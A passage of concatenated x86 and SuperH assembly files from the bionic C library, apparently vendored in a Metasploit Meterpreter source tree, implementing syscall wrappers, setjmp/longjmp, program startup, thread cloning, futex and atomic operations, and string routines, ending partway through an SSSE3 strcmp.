* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.type pipe, @function
.globl pipe
.align 4
pipe:
/* invoke trap */
mov.l 0f, r3 /* trap num */
trapa #(0 + 0x10)
/* check return value */
cmp/pz r0
bt setfds
/* keep error number */
sts.l pr, @-r15
mov.l 1f, r1
jsr @r1
mov r0, r4
lds.l @r15+, pr
bra end
nop
setfds:
mov.l r0, @r4
add #4, r4
mov.l r1, @r4
end:
rts
nop
.align 2
0: .long __NR_pipe
1: .long __set_syscall_errno
|
OpenWireSec/metasploit | 2,723 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/setjmp.S | /* $OpenBSD: setjmp.S,v 1.8 2005/08/07 11:30:38 espie Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
/*
* C library -- setjmp, longjmp
*
* longjmp(a,v)
* will generate a "return(v)" from the last call to
* setjmp(a)
* by restoring registers from the stack.
* The previous signal state is restored.
*/
ENTRY(setjmp)
PIC_PROLOGUE
pushl $0
#ifdef PIC
call PIC_PLT(_C_LABEL(sigblock))
#else
call _C_LABEL(sigblock)
#endif
addl $4,%esp
PIC_EPILOGUE
movl 4(%esp),%ecx
movl 0(%esp),%edx
movl %edx, 0(%ecx)
movl %ebx, 4(%ecx)
movl %esp, 8(%ecx)
movl %ebp,12(%ecx)
movl %esi,16(%ecx)
movl %edi,20(%ecx)
movl %eax,24(%ecx)
xorl %eax,%eax
ret
ENTRY(longjmp)
movl 4(%esp),%edx
PIC_PROLOGUE
pushl 24(%edx)
#ifdef PIC
call PIC_PLT(_C_LABEL(sigsetmask))
#else
call _C_LABEL(sigsetmask)
#endif
addl $4,%esp
PIC_EPILOGUE
movl 4(%esp),%edx
movl 8(%esp),%eax
movl 0(%edx),%ecx
movl 4(%edx),%ebx
movl 8(%edx),%esp
movl 12(%edx),%ebp
movl 16(%edx),%esi
movl 20(%edx),%edi
testl %eax,%eax
jnz 1f
incl %eax
1: movl %ecx,0(%esp)
ret
|
OpenWireSec/metasploit | 2,949 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/crtbegin_static.S | # bionic/arch-x86/bionic/crtbegin_static.S
#
# Copyright 2006, The Android Open Source Project
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Google Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Google Inc. ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL Google Inc. BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
.text
.align 4
.type _start, @function
.globl _start
# this is the small startup code that is first run when
# any executable that is statically-linked with Bionic
# runs.
#
# it's purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov %esp, %eax
mov $1f, %edx
pushl %edx
mov $0f, %edx
pushl %edx
mov $0, %edx
pushl %edx
pushl %eax
call __libc_init
0: jmp main
1: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 1,275 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/clone.S | #include <sys/linux-syscalls.h>
.text
/*
* int __pthread_clone(int (*fn)(void*), void *tls, int flags,
* void *arg);
*/
.globl __pthread_clone
.type __pthread_clone, @function
.align 4
__pthread_clone:
pushl %ebx
pushl %ecx
movl 16(%esp), %ecx
movl 20(%esp), %ebx
# insert arguments onto the child stack
movl 12(%esp), %eax
movl %eax, -12(%ecx)
movl 24(%esp), %eax
movl %eax, -8(%ecx)
lea (%ecx), %eax
movl %eax, -4(%ecx)
movl $__NR_clone, %eax
int $0x80
test %eax, %eax
jns 1f
# an error occured, set errno and return -1
negl %eax
call __set_errno
orl $-1, %eax
jmp 2f
1:
jnz 2f
# we're in the child thread now, call __thread_entry
# with the appropriate arguments on the child stack
# we already placed most of them
subl $16, %esp
jmp __thread_entry
hlt
2:
popl %ecx
popl %ebx
ret
/* XXX: TODO: Add __bionic_clone here
* See bionic/bionic_clone.c and arch-arm/bionic/clone.S
* for more details...
*/
|
OpenWireSec/metasploit | 1,511 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/__get_sp.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.type __get_sp, @function
.global __get_sp
.align 4
__get_sp:
mov %esp, %eax
ret
|
OpenWireSec/metasploit | 1,294 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/_exit_with_stack_teardown.S | #include <sys/linux-syscalls.h>
.text
.type _exit_with_stack_teardown, @function
.globl _exit_with_stack_teardown
.align 4
/*
* void _exit_with_stack_teardown(void *stackBase, int stackSize, int *retCode)
*/
_exit_with_stack_teardown:
/* we can trash %ebx here since this call should never return. */
/* We can also take advantage of the fact that the linux syscall trap
* handler saves all the registers, so we don't need a stack to keep
* the retCode argument for exit while doing the munmap */
/* TODO(dmtriyz): No one expects this code to return, so even if
* munmap fails, we have to exit. This should probably be fixed, but
* since ARM side does the same thing, leave it as is.
*/
mov 4(%esp), %ebx /* stackBase */
mov 8(%esp), %ecx /* stackSize */
mov 12(%esp), %edx /* retCode, not used for munmap */
mov $__NR_munmap, %eax
int $0x80
mov %edx, %ebx /* retrieve the retCode */
movl $__NR_exit, %eax
int $0x80
/* exit does not return */
/* can't have a ret here since we no longer have a usable stack. Seems
* that presently, 'hlt' will cause the program to segfault.. but this
* should never happen :) */
hlt
|
OpenWireSec/metasploit | 3,234 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/crtbegin_dynamic.S | # bionic/arch-x86/bionic/crtbegin_dynamic.S
#
# Copyright 2006, The Android Open Source Project
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Google Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Google Inc. ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL Google Inc. BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
.text
.align 4
.type _start, @function
.globl _start
# this is the small startup code that is first run when
# any executable that is dynamically-linked with Bionic
# runs.
#
# it's purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov %esp, %eax
mov $1f, %edx
pushl %edx
mov $0f, %edx
pushl %edx
mov $0, %edx
pushl %edx
pushl %eax
call __libc_init
0:
jmp main
1: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
# the .ctors section contains a list of pointers to "constructor"
# functions that need to be called in order during C library initialization,
# just before the program is being run. This is a C++ requirement
#
# the last entry shall be 0, and is defined in crtend.S
#
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 2,422 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/_setjmp.S | /* $OpenBSD: _setjmp.S,v 1.5 2005/08/07 11:30:38 espie Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
/*
* C library -- _setjmp, _longjmp
*
* _longjmp(a,v)
* will generate a "return(v)" from the last call to
* _setjmp(a)
* by restoring registers from the stack.
* The previous signal state is NOT restored.
*/
ENTRY(_setjmp)
movl 4(%esp),%eax
movl 0(%esp),%edx
movl %edx, 0(%eax) /* rta */
movl %ebx, 4(%eax)
movl %esp, 8(%eax)
movl %ebp,12(%eax)
movl %esi,16(%eax)
movl %edi,20(%eax)
xorl %eax,%eax
ret
ENTRY(_longjmp)
movl 4(%esp),%edx
movl 8(%esp),%eax
movl 0(%edx),%ecx
movl 4(%edx),%ebx
movl 8(%edx),%esp
movl 12(%edx),%ebp
movl 16(%edx),%esi
movl 20(%edx),%edi
testl %eax,%eax
jnz 1f
incl %eax
1: movl %ecx,0(%esp)
ret
|
OpenWireSec/metasploit | 3,764 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/atomics_x86.S | #include <sys/linux-syscalls.h>
#define FUTEX_WAIT 0
#define FUTEX_WAKE 1
/*
* int __futex_wait(volatile void *ftx, int val, const struct timespec *timeout)
*/
.text
.globl __futex_wait
.type __futex_wait, @function
.align 4
__futex_wait:
pushl %ebx
pushl %esi
mov 12(%esp), %ebx /* ftx */
movl $FUTEX_WAIT, %ecx
mov 16(%esp), %edx /* val */
mov 20(%esp), %esi /* timeout */
movl $__NR_futex, %eax
int $0x80
popl %esi
popl %ebx
ret
/* int __futex_wake(volatile void *ftx, int count) */
.text
.globl __futex_wake
.type __futex_wake, @function
.align 4
__futex_wake:
pushl %ebx
mov 8(%esp), %ebx /* ftx */
movl $FUTEX_WAKE, %ecx
mov 12(%esp), %edx /* count */
movl $__NR_futex, %eax
int $0x80
popl %ebx
ret
/* int __futex_syscall3(volatile void *ftx, int op, int count) */
.text
.globl __futex_syscall3
.type __futex_syscall3, @function
.align 4
__futex_syscall3:
pushl %ebx
movl 8(%esp), %ebx /* ftx */
movl 12(%esp), %ecx /* op */
movl 16(%esp), %edx /* value */
movl $__NR_futex, %eax
int $0x80
popl %ebx
ret
/* int __futex_syscall4(volatile void *ftx, int op, int val, const struct timespec *timeout) */
.text
.globl __futex_syscall4
.type __futex_syscall4, @function
.align 4
__futex_syscall4:
pushl %ebx
pushl %esi
movl 12(%esp), %ebx /* ftx */
movl 16(%esp), %ecx /* op */
movl 20(%esp), %edx /* val */
movl 24(%esp), %esi /* timeout */
movl $__NR_futex, %eax
int $0x80
popl %esi
popl %ebx
ret
/* int __atomic_cmpxchg(int old, int new, volatile int* addr) */
.text
.globl __atomic_cmpxchg
.type __atomic_cmpxchg, @function
.align 4
__atomic_cmpxchg:
mov 4(%esp), %eax /* old */
mov 8(%esp), %ecx /* new */
mov 12(%esp), %edx /* addr */
lock cmpxchg %ecx, (%edx)
jnz 1f
xor %eax, %eax
jmp 2f
1:
movl $1, %eax
2:
ret /* 0 == success, 1 == failure */
/* int __atomic_swap(int new, volatile int* addr) */
.text
.globl __atomic_swap
.type __atomic_swap, @function
.align 4
__atomic_swap:
mov 4(%esp), %ecx /* new */
mov 8(%esp), %edx /* addr */
lock xchg %ecx, (%edx)
mov %ecx, %eax
ret
/*
* int __atomic_dec(volatile int* addr)
*
* My x86 asm is really rusty.. this is probably suboptimal
*/
.text
.globl __atomic_dec
.type __atomic_dec, @function
.align 4
__atomic_dec:
pushl %ebx
pushl %esi
movl 12(%esp), %ebx /* addr */
1:
movl (%ebx), %esi /* old = *addr */
movl %esi, %edx
subl $1, %edx /* new = old - 1 */
pushl %ebx
pushl %edx
pushl %esi
call __atomic_cmpxchg
addl $12, %esp
test %eax, %eax
jnz 1b
movl %esi, %eax /* return old */
popl %esi
popl %ebx
ret
.text
/* int __atomic_inc(volatile int* addr) */
.globl __atomic_inc
.type __atomic_inc, @function
.align 4
__atomic_inc:
pushl %ebx
pushl %esi
movl 12(%esp), %ebx /* addr */
1:
movl (%ebx), %esi /* old = *addr */
movl %esi, %edx
addl $1, %edx /* new = old + 1 */
pushl %ebx
pushl %edx
pushl %esi
call __atomic_cmpxchg
addl $12, %esp
test %eax, %eax
jnz 1b
movl %esi, %eax /* return old */
popl %esi
popl %ebx
ret
|
OpenWireSec/metasploit | 1,709 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memcpy_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSSE3)
# include "cache_wrapper.S"
# undef __i686
# define MEMCPY memcpy
# define USE_AS_MEMMOVE
# include "ssse3-memcpy5.S"
#else
# include "memcpy.S"
#endif
|
OpenWireSec/metasploit | 1,699 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memset_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSE2)
# include "cache_wrapper.S"
# undef __i686
# define sse2_memset5_atom memset
# include "sse2-memset5-atom.S"
#else
# include "memset.S"
#endif
|
OpenWireSec/metasploit | 38,449 | external/source/meterpreter/source/bionic/libc/arch-x86/string/ssse3-strcmp.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef L
# define L(label) .L##label
#endif
#ifndef cfi_startproc
# define cfi_startproc .cfi_startproc
#endif
#ifndef cfi_endproc
# define cfi_endproc .cfi_endproc
#endif
#ifndef cfi_rel_offset
# define cfi_rel_offset(reg, off) .cfi_rel_offset reg, off
#endif
#ifndef cfi_restore
# define cfi_restore(reg) .cfi_restore (reg)
#endif
#ifndef cfi_adjust_cfa_offset
# define cfi_adjust_cfa_offset(off) .cfi_adjust_cfa_offset off
#endif
#ifndef ENTRY
# define ENTRY(name) \
.type name, @function; \
.globl name; \
.p2align 4; \
name: \
cfi_startproc
#endif
#ifndef END
# define END(name) \
cfi_endproc; \
.size name, .-name
#endif
#define CFI_PUSH(REG) \
cfi_adjust_cfa_offset (4); \
cfi_rel_offset (REG, 0)
#define CFI_POP(REG) \
cfi_adjust_cfa_offset (-4); \
cfi_restore (REG)
#define PUSH(REG) pushl REG; CFI_PUSH (REG)
#define POP(REG) popl REG; CFI_POP (REG)
#ifndef USE_AS_STRNCMP
# define STR1 4
# define STR2 STR1+4
# define RETURN ret
# define UPDATE_STRNCMP_COUNTER
#else
# define STR1 8
# define STR2 STR1+4
# define CNT STR2+4
# define RETURN POP (%ebp); ret; CFI_PUSH (%ebp)
# define UPDATE_STRNCMP_COUNTER \
/* calculate left number to compare */ \
mov $16, %esi; \
sub %ecx, %esi; \
cmp %esi, %ebp; \
jbe L(more8byteseq); \
sub %esi, %ebp
#endif
.section .text.ssse3,"ax",@progbits
ENTRY (ssse3_strcmp_latest)
#ifdef USE_AS_STRNCMP
PUSH (%ebp)
#endif
movl STR1(%esp), %edx
movl STR2(%esp), %eax
#ifdef USE_AS_STRNCMP
movl CNT(%esp), %ebp
cmp $16, %ebp
jb L(less16bytes_sncmp)
jmp L(more16bytes)
#endif
movzbl (%eax), %ecx
cmpb %cl, (%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 1(%eax), %ecx
cmpb %cl, 1(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 2(%eax), %ecx
cmpb %cl, 2(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 3(%eax), %ecx
cmpb %cl, 3(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 4(%eax), %ecx
cmpb %cl, 4(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 5(%eax), %ecx
cmpb %cl, 5(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 6(%eax), %ecx
cmpb %cl, 6(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 7(%eax), %ecx
cmpb %cl, 7(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
add $8, %edx
add $8, %eax
#ifdef USE_AS_STRNCMP
cmp $8, %ebp
lea -8(%ebp), %ebp
je L(eq)
L(more16bytes):
#endif
movl %edx, %ecx
and $0xfff, %ecx
cmp $0xff0, %ecx
ja L(crosspage)
mov %eax, %ecx
and $0xfff, %ecx
cmp $0xff0, %ecx
ja L(crosspage)
pxor %xmm0, %xmm0
movlpd (%eax), %xmm1
movlpd (%edx), %xmm2
movhpd 8(%eax), %xmm1
movhpd 8(%edx), %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %ecx
sub $0xffff, %ecx
jnz L(less16bytes)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(eq)
#endif
add $16, %eax
add $16, %edx
L(crosspage):
PUSH (%ebx)
PUSH (%edi)
PUSH (%esi)
movl %edx, %edi
movl %eax, %ecx
and $0xf, %ecx
and $0xf, %edi
xor %ecx, %eax
xor %edi, %edx
xor %ebx, %ebx
cmp %edi, %ecx
je L(ashr_0)
ja L(bigger)
or $0x20, %ebx
xchg %edx, %eax
xchg %ecx, %edi
L(bigger):
lea 15(%edi), %edi
sub %ecx, %edi
cmp $8, %edi
jle L(ashr_less_8)
cmp $14, %edi
je L(ashr_15)
cmp $13, %edi
je L(ashr_14)
cmp $12, %edi
je L(ashr_13)
cmp $11, %edi
je L(ashr_12)
cmp $10, %edi
je L(ashr_11)
cmp $9, %edi
je L(ashr_10)
L(ashr_less_8):
je L(ashr_9)
cmp $7, %edi
je L(ashr_8)
cmp $6, %edi
je L(ashr_7)
cmp $5, %edi
je L(ashr_6)
cmp $4, %edi
je L(ashr_5)
cmp $3, %edi
je L(ashr_4)
cmp $2, %edi
je L(ashr_3)
cmp $1, %edi
je L(ashr_2)
cmp $0, %edi
je L(ashr_1)
/*
